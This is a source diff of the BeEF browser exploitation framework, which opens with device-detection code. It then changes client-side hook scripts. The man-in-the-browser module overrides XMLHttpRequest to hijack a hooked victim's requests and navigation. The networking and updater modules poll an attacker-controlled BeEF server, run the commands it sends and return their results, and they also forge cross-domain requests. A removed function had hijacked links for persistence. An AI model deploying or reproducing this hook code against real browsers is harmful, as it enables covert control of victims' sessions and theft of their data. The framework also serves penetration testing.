+      (uagent.search(deviceTablet) > -1))
+      return true;
+   else
+      return false;
+}
+
+function DetectSonyPlaystation()
+{
+   if (uagent.search(devicePlaystation) > -1)
+      return true;
+   else
+      return false;
+};
+
+function DetectNintendo()
+{
+   if (uagent.search(deviceNintendo) > -1   ||
+	uagent.search(deviceWii) > -1 ||
+	uagent.search(deviceNintendoDs) > -1)
+      return true;
+   else
+      return false;
+};
+
+function DetectXbox()
+{
+   if (uagent.search(deviceXbox) > -1)
+      return true;
+   else
+      return false;
+};
+
+function DetectGameConsole()
+{
+   if (DetectSonyPlaystation())
+      return true;
+   if (DetectNintendo())
+      return true;
+   if (DetectXbox())
+      return true;
+   else
+      return false;
+};
+
+function DetectKindle()
+{
+   if (uagent.search(deviceKindle) > -1 &&
+       !DetectAndroid())
+      return true;
+   else
+      return false;
+}
+
+function DetectAmazonSilk()
+{
+   if (uagent.search(engineSilk) > -1)
+      return true;
+   else
+      return false;
+}
+
+function DetectMobileQuick()
+{
+   if (DetectTierTablet())
+      return false;
+
+   if (DetectSmartphone())
+      return true;
+
+   if (uagent.search(deviceMidp) > -1 ||
+	DetectBrewDevice())
+      return true;
+
+   if (DetectOperaMobile())
+      return true;
+
+   if (uagent.search(engineNetfront) > -1)
+      return true;
+   if (uagent.search(engineUpBrowser) > -1)
+      return true;
+   if (uagent.search(engineOpenWeb) > -1)
+      return true;
+
+   if (DetectDangerHiptop())
+      return true;
+
+   if (DetectMaemoTablet())
+      return true;
+   if (DetectArchos())
+      return true;
+
+   if ((uagent.search(devicePda) > -1) &&
+        !(uagent.search(disUpdate) > -1))
+      return true;
+   if (uagent.search(mobile) > -1)
+      return true;
+
+   if (DetectKindle() ||
+       DetectAmazonSilk())
+      return true;
+
+   return false;
+};
+
+
+function DetectMobileLong()
+{
+   if (DetectMobileQuick())
+      return true;
+   if (DetectGameConsole())
+      return true;
+   if (DetectSonyMylo())
+      return true;
+
+   if (uagent.search(manuSamsung1) > -1 ||
+	uagent.search(manuSonyEricsson) > -1 ||
+	uagent.search(manuericsson) > -1)
+      return true;
+
+   if (uagent.search(svcDocomo) > -1)
+      return true;
+   if (uagent.search(svcKddi) > -1)
+      return true;
+   if (uagent.search(svcVodafone) > -1)
+      return true;
+
+
+   return false;
+};
+
+
+function DetectTierTablet()
+{
+   if (DetectIpad()
+        || DetectAndroidTablet()
+        || DetectBlackBerryTablet()
+        || DetectWebOSTablet())
+      return true;
+   else
+      return false;
+};
+
+function DetectTierIphone()
+{
+   if (DetectIphoneOrIpod())
+      return true;
+   if (DetectAndroidPhone())
+      return true;
+   if (DetectBlackBerryWebKit() && DetectBlackBerryTouch())
+      return true;
+   if (DetectWindowsPhone7())
+      return true;
+   if (DetectPalmWebOS())
+      return true;
+   if (DetectGarminNuvifone())
+      return true;
+   else
+      return false;
+};
+
+function DetectTierRichCss()
+{
+    if (DetectMobileQuick())
+    {
+       if (DetectTierIphone() || DetectKindle())
+          return false;
+
+       if (DetectWebkit())
+          return true;
+       if (DetectS60OssBrowser())
+          return true;
+
+       if (DetectBlackBerryHigh())
+          return true;
+
+       if (DetectWindowsMobile())
+          return true;
+
+       if (uagent.search(engineTelecaQ) > -1)
+          return true;
+
+       else
+          return false;
+    }
+    else
+      return false;
+};
+
+function DetectTierOtherPhones()
+{
+    if (DetectMobileLong())
+    {
+       if (DetectTierIphone() || DetectTierRichCss())
+          return false;
+
+       else
+          return true;
+    }
+    else
+      return false;
+};
+
+
+function InitDeviceScan()
+{
+    isIphone = DetectIphoneOrIpod();
+    isAndroidPhone = DetectAndroidPhone();
+    isTierIphone = DetectTierIphone();
+    isTierTablet = DetectTierTablet();
+
+    isTierRichCss = DetectTierRichCss();
+    isTierGenericMobile = DetectTierOtherPhones();
+};
+
+InitDeviceScan()

core/main/client/logger.js

@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 /*!
  * @literal object: beef.logger
  *

core/main/client/mitb.js

@@ -1,19 +1,10 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
 
+
 beef.mitb = {
 
     cid:null,
@@ -23,47 +14,30 @@ beef.mitb = {
         beef.mitb.cid = cid;
         beef.mitb.curl = curl;
         /*Override open method to intercept ajax request*/
-        var xml_type;
+        var hook_file = "<%= @hook_file %>";
 
         if (window.XMLHttpRequest && !(window.ActiveXObject)) {
 
-            xml_type = 'XMLHttpRequest';
-        }
-
-        if (xml_type == "XMLHttpRequest") {
             beef.mitb.sniff("Method XMLHttpRequest.open override");
             (function (open) {
-                XMLHttpRequest.prototype.open = function (method, url, async, user, pass) {
-
-                    var portRegex = new RegExp(":[0-9]+");
-                    var portR = portRegex.exec(url);
-                    /*return :port*/
-                    var requestPort;
-
-                    if (portR != null) {
-                        requestPort = portR[0].split(":");
-                    }
-
-                    if ((user == "beef") && (pass == "beef")) {
-                        /*a poisoned something*/
-                        open.call(this, method, url, async, null, null);
-                    }
-
-
-                    else if (url.indexOf("hook.js") != -1 || url.indexOf("/dh?") != -1) {
-                        /*a beef hook.js polling or dh */
-                        open.call(this, method, url, async, null, null);
-                    }
-
-                    else {
+                XMLHttpRequest.prototype.open = function (method, url, async, mitb_call) {
+                    // Ignore it and don't hijack it. It's either a request to BeEF (hook file or Dynamic Handler)
+                    // or a request initiated by the MiTB itself.
+                    if (mitb_call || (url.indexOf(hook_file) != -1 || url.indexOf("/dh?") != -1)) {
+                        open.call(this, method, url, async, true);
+                    }else {
+                        var portRegex = new RegExp(":[0-9]+");
+                        var portR = portRegex.exec(url);
+                        var requestPort;
+                        if (portR != null) { requestPort = portR[0].split(":")[1]; }
 
+                        //GET request
                         if (method == "GET") {
+                            //GET request -> cross-domain
                             if (url.indexOf(document.location.hostname) == -1 || (portR != null && requestPort != document.location.port )) {
                                 beef.mitb.sniff("GET [Ajax CrossDomain Request]: " + url);
                                 window.open(url);
-
-                            }
-                            else {
+                            }else { //GET request -> same-domain
                                 beef.mitb.sniff("GET [Ajax Request]: " + url);
                                 if (beef.mitb.fetch(url, document.getElementsByTagName("html")[0])) {
                                     var title = "";
@@ -72,26 +46,19 @@ beef.mitb = {
                                     } else {
                                         title = document.getElementsByTagName("title")[0].innerHTML;
                                     }
-                                    /*write the url of the page*/
+                                    // write the url of the page
                                     history.pushState({ Be:"EF" }, title, url);
-
                                 }
-
                             }
-
-                        }
-                        else {
-                            /*if we are here we have an ajax post req*/
-                            beef.mitb.sniff("Post ajax request to: " + url);
-                            open.call(this, method, url, async, user, pass);
-
+                        }else{
+                            //POST request
+                            beef.mitb.sniff("POST ajax request to: " + url);
+                            open.call(this, method, url, async, true);
                         }
                     }
                 };
             })(XMLHttpRequest.prototype.open);
-
         }
-
     },
 
     // Initializes the hook on anchors and forms.
@@ -170,7 +137,7 @@ beef.mitb = {
     fetchForm:function (url, query, target) {
         try {
             var y = new XMLHttpRequest();
-            y.open('POST', url, false, "beef", "beef");
+            y.open('POST', url, false, true);
             y.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
             y.onreadystatechange = function () {
                 if (y.readyState == 4 && y.responseText != "") {
@@ -190,14 +157,13 @@ beef.mitb = {
     fetch:function (url, target) {
         try {
             var y = new XMLHttpRequest();
-            y.open('GET', url, false, "beef", "beef");
+            y.open('GET', url, false, true);
             y.onreadystatechange = function () {
                 if (y.readyState == 4 && y.responseText != "") {
-
                     target.innerHTML = y.responseText;
                     setTimeout(beef.mitb.hook, 10);
                 }
-            }
+            };
             y.send(null);
             beef.mitb.sniff("GET: " + url);
             return true;
@@ -213,7 +179,7 @@ beef.mitb = {
         try {
             var target = document.getElementsByTagName("html")[0];
             var y = new XMLHttpRequest();
-            y.open('GET', url, false, "beef", "beef");
+            y.open('GET', url, false, true);
             y.onreadystatechange = function () {
                 if (y.readyState == 4 && y.responseText != "") {
                     var title = "";
@@ -232,11 +198,9 @@ beef.mitb = {
             beef.mitb.sniff("GET: " + url);
 
         } catch (x) {
-
-
+            // the link is cross-domain, so load the resource in a different tab
             window.open(url);
             beef.mitb.sniff("GET [New Window]: " + url);
-
         }
     },
 

core/main/client/net.js

@@ -1,35 +1,37 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 /*!
  * @literal object: beef.net
  *
- * Provides basic networking functions.
+ * Provides basic networking functions,
+ * like beef.net.request and beef.net.forgeRequest,
+ * used by BeEF command modules and the Requester extension,
+ * as well as beef.net.send which is used to return commands
+ * to BeEF server-side components.
+ *
+ * Also, it contains the core methods used by the XHR-polling
+ * mechanism (flush, queue)
  */
 beef.net = {
 
     host:"<%= @beef_host %>",
     port:"<%= @beef_port %>",
     hook:"<%= @beef_hook %>",
+    httpproto:"<%= @beef_proto %>",
     handler:'/dh',
     chop:500,
     pad:30, //this is the amount of padding for extra params such as pc, pid and sid
     sid_count:0,
     cmd_queue:[],
 
-    //Command object
+    /**
+     * Command object. This represents the data to be sent back to BeEF,
+     * using the beef.net.send() method.
+     */
     command:function () {
         this.cid = null;
         this.results = null;
@@ -37,13 +39,17 @@ beef.net = {
         this.callback = null;
     },
 
-    //Packet object
+    /**
+     * Packet object. A single chunk of data. X packets -> 1 stream
+     */
     packet:function () {
         this.id = null;
         this.data = null;
     },
 
-    //Stream object
+    /**
+     * Stream object. Contains X packets, which are command result chunks.
+     */
     stream:function () {
         this.id = null;
         this.packets = [];
@@ -59,7 +65,8 @@ beef.net = {
 
     /**
      * Response Object - used in the beef.net.request callback
-     * Note: as we are using async mode, the response object will be empty if returned.Using sync mode, request obj fields will be populated.
+     * NOTE: as we are using async mode, the response object will be empty if returned.
+     * Using sync mode, request obj fields will be populated.
      */
     response:function () {
         this.status_code = null;        // 500, 404, 200, 302
@@ -72,7 +79,13 @@ beef.net = {
         this.headers = null;            // full response headers
     },
 
-    //Queues the command, to be sent back to the framework on the next refresh
+    /**
+     * Queues the specified command results.
+     * @param: {String} handler: the server-side handler that will be called
+     * @param: {Integer} cid: command id
+     * @param: {String} results: the data to send
+     * @param: {Function} callback: the function to call after execution
+     */
     queue:function (handler, cid, results, callback) {
         if (typeof(handler) === 'string' && typeof(cid) === 'number' && (callback === undefined || typeof(callback) === 'function')) {
             var s = new beef.net.command();
@@ -84,26 +97,40 @@ beef.net = {
         }
     },
 
-    //Queues the current command and flushes the queue straight away
+    /**
+     * Queues the current command results and flushes the queue straight away.
+     * NOTE: Always send Browser Fingerprinting results
+     * (beef.net.browser_details(); -> /init handler) using normal XHR-polling,
+     * even if WebSockets are enabled.
+     * @param: {String} handler: the server-side handler that will be called
+     * @param: {Integer} cid: command id
+     * @param: {String} results: the data to send
+     * @param: {Function} callback: the function to call after execution
+     */
     send:function (handler, cid, results, callback) {
-        if (typeof beef.websocket === "undefined") {
+        if (typeof beef.websocket === "undefined" || (handler === "/init" && cid == 0)) {
             this.queue(handler, cid, results, callback);
             this.flush();
-        }
-        else {
+        }else {
             try {
                 beef.websocket.send('{"handler" : "' + handler + '", "cid" :"' + cid +
                     '", "result":"' + beef.encode.base64.encode(beef.encode.json.stringify(results)) +
                     '","callback": "' + callback + '","bh":"' + beef.session.get_hook_session_id() + '" }');
-            }
-            catch (e) {
+            }catch (e) {
                 this.queue(handler, cid, results, callback);
                 this.flush();
-                }
+            }
         }
     },
 
-    //Flush all currently queued commands to the framework
+    /**
+     * Flush all currently queued command results to the framework,
+     * chopping the data in chunks ('chunk' method) which will be re-assembled
+     * server-side by the network stack.
+     * NOTE: currently 'flush' is used only with the default
+     * XHR-polling mechanism. If WebSockets are used, the data is sent
+     * back to BeEF straight away.
+     */
     flush:function () {
         if (this.cmd_queue.length > 0) {
             var data = beef.encode.base64.encode(beef.encode.json.stringify(this.cmd_queue));
@@ -127,22 +154,30 @@ beef.net = {
         }
     },
 
-    //Split string into chunk lengths determined by amount
+    /**
+     * Split the input data into chunk lengths determined by the amount parameter.
+     * @param: {String} str: the input data
+     * @param: {Integer} amount: chunk length
+     */
     chunk:function (str, amount) {
         if (typeof amount == 'undefined') n = 2;
         return str.match(RegExp('.{1,' + amount + '}', 'g'));
     },
 
-    //Push packets to framework
+    /**
+     * Push the input stream back to the BeEF server-side components.
+     * It uses beef.net.request to send back the data.
+     * @param: {Object} stream: the stream object to be sent back.
+     */
     push:function (stream) {
         //need to implement wait feature here eventually
         for (var i = 0; i < stream.pc; i++) {
-            this.request(this.port == '443' ? 'https' : 'http', 'GET', this.host, this.port, this.handler, null, stream.get_packet_data(), 10, 'text', null);
+            this.request(this.httpproto, 'GET', this.host, this.port, this.handler, null, stream.get_packet_data(), 10, 'text', null);
         }
     },
 
     /**
-     *Performs http requests
+     * Performs http requests
      * @param: {String} scheme: HTTP or HTTPS
      * @param: {String} method: GET or POST
      * @param: {String} domain: bindshell.net, 192.168.3.4, etc
@@ -201,13 +236,12 @@ beef.net = {
             data:data,
             timeout:(timeout * 1000),
 
-            //needed otherwise jQuery always add Content-type: application/xml, even if data is populated
+            //This is needed, otherwise jQuery always add Content-type: application/xml, even if data is populated.
             beforeSend:function (xhr) {
                 if (method == "POST") {
                     xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded; charset=utf-8");
                 }
             },
-
             success:function (data, textStatus, xhr) {
                 var end_time = new Date().getTime();
                 response.status_code = xhr.status;
@@ -248,9 +282,11 @@ beef.net = {
     },
 
     /*
-     * Similar to this.request, except from a few things that are needed when dealing with forged requests:
+     * Similar to beef.net.request, except from a few things that are needed when dealing with forged requests:
      *  - requestid: needed on the callback
      *  - allowCrossDomain: set cross-domain requests as allowed or blocked
+     *
+     * forge_request is used mainly by the Requester and Tunneling Proxy Extensions.
      */
     forge_request:function (scheme, method, domain, port, path, anchor, headers, data, timeout, dataType, allowCrossDomain, requestid, callback) {
 
@@ -293,14 +329,21 @@ beef.net = {
             return response;
         }
 
-        // build and execute the request
-        if (method == "POST") {
+        /*
+         * according to http://api.jquery.com/jQuery.ajax/, Note: having 'script':
+         * This will turn POSTs into GETs for remote-domain requests.
+         */
+        if (method == "POST"){
             $j.ajaxSetup({
-                data:data
+                dataType: dataType
+            });
+        } else {
+            $j.ajaxSetup({
+                dataType: 'script'
             });
         }
 
-		// this is required for bugs in IE so data can be transfered back to the server
+		// this is required for bugs in IE so data can be transferred back to the server
         if ( beef.browser.isIE() ) {
             dataType = 'script'
         }
@@ -311,9 +354,7 @@ beef.net = {
             headers: headers,
             timeout: (timeout * 1000),
 
-            // needed otherwise jQuery always adds:
-            // Content-type: application/xml
-            // even if data is populated
+            //This is needed, otherwise jQuery always add Content-type: application/xml, even if data is populated.
             beforeSend:function (xhr) {
                 if (method == "POST") {
                     xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded; charset=utf-8");
@@ -415,7 +456,9 @@ beef.net = {
         return false;
     },
 
-    //Sends back browser details to framework
+    /**
+     * Sends back browser details to framework, calling beef.browser.getDetails()
+     */
     browser_details:function () {
         var details = beef.browser.getDetails();
         details['HookSessionID'] = beef.session.get_hook_session_id();

core/main/client/net/cors.js

@@ -0,0 +1,77 @@
+beef.net.cors = {
+
+  handler: "cors",
+
+    /**
+     * Response Object - used in the beef.net.request callback
+     */
+    response:function () {
+        this.status  = null;      // 500, 404, 200, 302, etc
+        this.headers = null;      // full response headers
+        this.body    = null;      // full response body
+    },
+
+    /**
+     * Make a cross-domain request using CORS
+     *
+     * @param method {String} HTTP verb ('GET', 'POST', 'DELETE', etc.)
+     * @param url {String} url
+     * @param data {String} request body
+     * @param callback {Function} function to callback on completion
+     */
+    request: function(method, url, data, callback) {
+
+    var xhr;
+    var response = new this.response;
+
+    if (XMLHttpRequest) {
+        xhr = new XMLHttpRequest();
+
+        if ('withCredentials' in xhr) {
+            xhr.open(method, url, true);
+            xhr.onerror = function() {
+            };
+            xhr.onreadystatechange = function() {
+                if (xhr.readyState === 4) {
+                    response.headers = this.getAllResponseHeaders()
+                    response.body    = this.responseText;
+                    response.status  = this.status;
+                    if (!!callback) {
+                        if (!!response) {
+                            callback(response);
+                        } else { 
+                            callback('ERROR: No Response. CORS requests may be denied for this resource.')
+                        }
+                    }
+                }
+            };
+            xhr.send(data);
+        }
+    } else if (typeof XDomainRequest != "undefined") {
+        xhr = new XDomainRequest();
+        xhr.open(method, url);
+        xhr.onerror = function() {
+        };
+        xhr.onload = function() {
+            response.headers = this.getAllResponseHeaders()
+            response.body    = this.responseText;
+            response.status  = this.status;
+            if (!!callback) {
+                if (!!response) {
+                    callback(response);
+                } else {
+                    callback('ERROR: No Response. CORS requests may be denied for this resource.')
+                }
+            }
+        };
+        xhr.send(data);
+    } else {
+        if (!!callback) callback('ERROR: Not Supported. CORS is not supported by the browser. The request was not sent.');
+    }
+
+    }
+
+};
+
+beef.regCmp('beef.net.cors');
+

core/main/client/net/dns.js

@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 /*!
  * @literal object: beef.net.dns
  * 

core/main/client/net/local.js

@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 /*!
  * @literal object: beef.net.local
  * 

core/main/client/net/portscanner.js

@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 /*!
  * @literal object: beef.net.portscanner
  * 

core/main/client/net/requester.js

@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 /*!
  * @literal object: beef.net.requester
  * 

core/main/client/os.js

@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.os = {
 
 	ua: navigator.userAgent,
@@ -73,6 +64,10 @@ beef.os = {
 		return (this.ua.match('(Mac_PowerPC)|(Macintosh)|(MacIntel)')) ? true : false;
 	},
 
+	isWinPhone: function() {
+		return (this.ua.match('(Windows Phone)')) ? true : false;
+	},
+
 	isIphone: function() {
 		return (this.ua.indexOf('iPhone') != -1) ? true : false;
 	},
@@ -97,6 +92,10 @@ beef.os = {
 		return (this.ua.match('BlackBerry')) ? true : false;
 	},
 
+	isWebOS: function() {
+		return (this.ua.match('webOS')) ? true : false;
+	},
+
 	isQNX: function() {
 		return (this.ua.match('QNX')) ? true : false;
 	},
@@ -139,11 +138,14 @@ beef.os = {
 		if(this.isSunOS()) return 'Sun OS';
 
 		//iPhone
-		if (this.isIphone()) return 'iPhone';
+		if (this.isIphone()) return 'iOS';
 		//iPad
-		if (this.isIpad()) return 'iPad';
+		if (this.isIpad()) return 'iOS';
 		//iPod
-		if (this.isIpod()) return 'iPod';
+		if (this.isIpod()) return 'iOS';
+
+		// zune
+		//if (this.isZune()) return 'Zune';
 		
 		//macintosh
 		if(this.isMacintosh()) {
@@ -156,6 +158,7 @@ beef.os = {
 		//others
 		if(this.isQNX()) return 'QNX';
 		if(this.isBeOS()) return 'BeOS';
+		if(this.isWebOS()) return 'webOS';
 		
 		return 'unknown';
 	}

core/main/client/session.js

@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 /*!
  * @literal object: beef.session
  *
@@ -77,26 +68,7 @@ beef.session = {
 		}
 		
 		return hook_session_id;
-	},
-
-	/**
-	 * Overrides each link, and creates an iframe (loading the href) instead of following the link
-	 */
-	persistent: function() {
-		$j('a').click(function(e) {
-			if ($j(this).attr('href') != '')
-			{
-				e.preventDefault();
-				beef.dom.createIframe('fullscreen', 'get', {'src':$j(this).attr('href')}, {}, null);
-				$j(document).attr('title', $j(this).html());
-				document.body.scroll = "no";
-				document.documentElement.style.overflow = 'hidden';
-			}
-		});
 	}
-	
-
-				
 };
 
 beef.regCmp('beef.session');

core/main/client/timeout.js

@@ -0,0 +1,17 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+/*
+ Sometimes there are timing issues and looks like beef_init
+ is not called at all (always in cross-domain situations,
+ for example calling the hook with jquery getScript,
+ or sometimes with event handler injections).
+
+ To fix this, we call again beef_init after 1 second.
+ Cheers to John Wilander that discussed this bug with me at OWASP AppSec Research Greece
+ antisnatchor
+ */
+setTimeout(beef_init, 1000);

core/main/client/updater.js

@@ -1,29 +1,20 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 /*!
  * @Literal object: beef.updater
  *
  * Object in charge of getting new commands from the BeEF framework and execute them.
+ * The XHR-polling channel is managed here. If WebSockets are enabled,
+ * websocket.ls is used instead.
  */
 beef.updater = {
 	
-	// Low timeouts combined with the way the framework sends commamd modules result 
-	// in instructions being sent repeatedly or complex code. 
-	// If you suffer from ADHD, you can decrease this setting.
-	timeout: 5000,
+	// XHR-polling timeout.
+    xhr_poll_timeout: "<%= @xhr_poll_timeout %>",
 	
 	// A lock.
 	lock: false,
@@ -51,22 +42,22 @@ beef.updater = {
 			beef.net.flush();
 			if(beef.commands.length > 0) {
 				this.execute_commands();
-			}
-
-            else {
+			}else {
 				this.get_commands();    /*Polling*/
 			}
 		}
 
       // ( typeof beef.websocket === "undefined")
-		setTimeout("beef.updater.check();", beef.updater.timeout);
+		setTimeout("beef.updater.check();", beef.updater.xhr_poll_timeout);
 	},
 	
-	// Gets new commands from the framework.
-	get_commands: function(http_response) {
+    /**
+     * Gets new commands from the framework.
+     */
+	get_commands: function() {
 		try {
 			this.lock = true;
-            beef.net.request('http', 'GET', beef.net.host, beef.net.port, beef.net.hook, null, 'BEEFHOOK='+beef.session.get_hook_session_id(), 1, 'script', function(response) {
+            beef.net.request(beef.net.httpproto, 'GET', beef.net.host, beef.net.port, beef.net.hook, null, 'BEEFHOOK='+beef.session.get_hook_session_id(), 5, 'script', function(response) {
                 if (response.body != null && response.body.length > 0)
                     beef.updater.execute_commands();
             });
@@ -77,13 +68,12 @@ beef.updater = {
 		this.lock = false;
 	},
 	
-	// Executes the received commands if any.
+    /**
+     * Executes the received commands, if any.
+     */
 	execute_commands: function() {
 		if(beef.commands.length == 0) return;
-		
 		this.lock = true;
-		/*here execute the command */
-
 		while(beef.commands.length > 0) {
 			command = beef.commands.pop();
 			try {
@@ -92,7 +82,6 @@ beef.updater = {
 				console.error('execute_commands - command failed to execute: ' + e.message);
 			}
 		}
-		
 		this.lock = false;
 	}
 };

core/main/client/websocket.js

@@ -1,72 +1,90 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
 
-//beef.websocket.socket.send(take answer to server beef)
-/*New browser init call this */
+
+/**
+ * @Literal object: beef.websocket
+ *
+ * Manage the WebSocket communication channel.
+ * This channel is much faster and responsive, and it's used automatically
+ * if the browser supports WebSockets AND beef.http.websocket.enable = true.
+ */
 
 beef.websocket = {
 
     socket:null,
-    alive_timer:<%= @websocket_timer %>,
+    ws_poll_timeout: "<%= @ws_poll_timeout %>",
 
+    /**
+     * Initialize the WebSocket client object.
+     * Note: use WebSocketSecure only if the hooked domain is under https.
+     * Mixed-content in WS is quite different from a non-WS context.
+     */
     init:function () {
         var webSocketServer = beef.net.host;
-        var webSocketPort = <%= @websocket_port %>;
-        var webSocketSecure = <%= @websocket_secure %>;
